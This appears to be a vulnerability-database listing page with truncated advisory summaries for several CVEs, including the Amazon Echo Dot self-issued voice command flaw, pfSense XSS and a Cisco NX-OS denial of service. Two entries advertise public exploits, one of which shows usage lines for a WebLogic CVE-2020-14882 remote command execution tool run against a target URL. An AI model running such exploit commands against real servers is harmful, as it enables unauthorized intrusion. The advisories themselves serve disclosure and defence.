Exploit for Expression Language Injection in Apache Struts

s2-062 Remote code execution for S2-062 CVE-2021-31805 – Ver...

Novel Attack Turns Amazon Devices Against Themselves

UPDATE Researchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves. The – dubbed “Alexa vs. Alexa” – leverages what the researchers called “a command self-issue vulnerability”: using pre-recorded messages which,...

CVE-2022-25809

Improper Neutralization of audio output from 3rd and 4th Generation Amazon Echo Dot devices allows arbitrary voice command execution on these devices via a malicious skill in the case of remote attackers or by pairing a malicious Bluetooth device in the case of physically proximate attackers, aka...

CVE-2022-25809

Improper Neutralization of audio output from 3rd and 4th Generation Amazon Echo Dot devices allows arbitrary voice command execution on these devices via a malicious skill in the case of remote attackers or by pairing a malicious Bluetooth device in the case of physically proximate attackers, aka...

Input validation

Improper Neutralization of audio output from 3rd and 4th Generation Amazon Echo Dot devices allows arbitrary voice command execution on these devices via a malicious skill in the case of remote attackers or by pairing a malicious Bluetooth device in the case of physically proximate attackers, aka...

Amazon Echo Dot 安全漏洞

The Amazon Echo Dot is a voice-activated speaker from Amazon.com. It can be used to play music, control smart home devices, make calls, answer questions, set timers and alarms, and more using Alexa. The Amazon Echo Dot 3rd and 4th generation has a security vulnerability that stems from improper...

CVE-2022-25809

CVE-2022-25809 affects Amazon Echo Dot devices (3rd and 4th Gen). Root cause: improper neutralization of audio output enables arbitrary voice command execution via a malicious skill (remote) or by pairing a malicious Bluetooth device (physical proximity) in an Alexa-versus-Alexa (AvA) scenario. I...

PT-2022-17534 · Amazon · Amazon Echo Dot

Name of the Vulnerable Software and Affected Versions: Amazon Echo Dot devices, 3rd and 4th Generation Description: The issue allows for arbitrary voice command execution on affected devices. This can be achieved by a remote attacker using a malicious skill or by a physically proximate attacker...

Mageia: Security Advisory (MGASA-2021-0027)

The remote host is missing an update for the SPDX-FileCopyrightText: 2022 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2022-23993

/usr/local/www/pkg.php in pfSense CE before 2.6.0 and pfSense Plus before 22.01 uses $REQUEST'pkgfilter' in a PHP echo call, causing XSS...

Code injection

A vulnerability has been identified in APOGEE MBC PPC BACnet All versions, APOGEE MBC PPC P2 Ethernet All versions, APOGEE MEC PPC BACnet All versions, APOGEE MEC PPC P2 Ethernet All versions, APOGEE PXC Compact BACnet All versions = V2.3 and = V2.3 and = V2.3 and = V2.3 and = V2.3 and = V2.3 and...

Siemens Nucleus ReadyStart 安全漏洞

Siemens Nucleus ReadyStart is a bundled solution from Siemens, Germany. It is used to accelerate the fast startup of complete systems and provides a rich set of board support packages Bsp. A security vulnerability exists in Siemens Nucleus ReadyStart, which originates from an ICMP echo packet wit...

CVE-2021-1588

A vulnerability in the MPLS Operation, Administration, and Maintenance OAM feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service DoS condition on an affected device. This vulnerability is due to improper input validation when an affected devi...

CVE-2021-1588 Cisco NX-OS Software MPLS OAM Denial of Service Vulnerability

A vulnerability in the MPLS Operation, Administration, and Maintenance OAM feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service DoS condition on an affected device. This vulnerability is due to improper input validation when an affected devi...

Cisco NX-OS Software 缓冲区错误漏洞

A denial-of-service vulnerability exists in the MPLS OAM feature of Cisco NX-OS Software, which can be exploited by an attacker by sending malicious MPLS echo requests or echo reply packets to cause the MPLS OAM process to crash and restart multiple times...

Exploit for CVE-2020-14882

CVE-2020-14882ALL CVE-2020-14882ALL综合利用工具，支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 需要模块：requests、http.client （工具仅用于授权的安全测试，请勿用于非法使用，违规行为与作者无关。） 选项 功能一：命令回显 python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "net user" python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "whoami" 功能二：批量命令回显 python3...

CVE-2021-37436

Amazon Echo Dot devices through 2021-07-02 sometimes allow attackers, who have physical access to a device after a factory reset, to obtain sensitive information via a series of complex hardware and software attacks. NOTE: reportedly, there were vendor marketing statements about safely removing...

CVE-2021-37436

Amazon Echo Dot devices through 2021-07-02 sometimes allow attackers, who have physical access to a device after a factory reset, to obtain sensitive information via a series of complex hardware and software attacks. NOTE: reportedly, there were vendor marketing statements about safely removing...

Design/Logic Flaw

Amazon Echo Dot devices through 2021-07-02 sometimes allow attackers, who have physical access to a device after a factory reset, to obtain sensitive information via a series of complex hardware and software attacks. NOTE: reportedly, there were vendor marketing statements about safely removing...

CVE-2021-37436

CVE-2021-37436 affects Amazon Echo Dot devices. The connected sources describe a design/logic flaw that, after a factory reset, can let an attacker with physical access extract sensitive information through a sequence of hardware and software attacks. There are no published patch details in the p...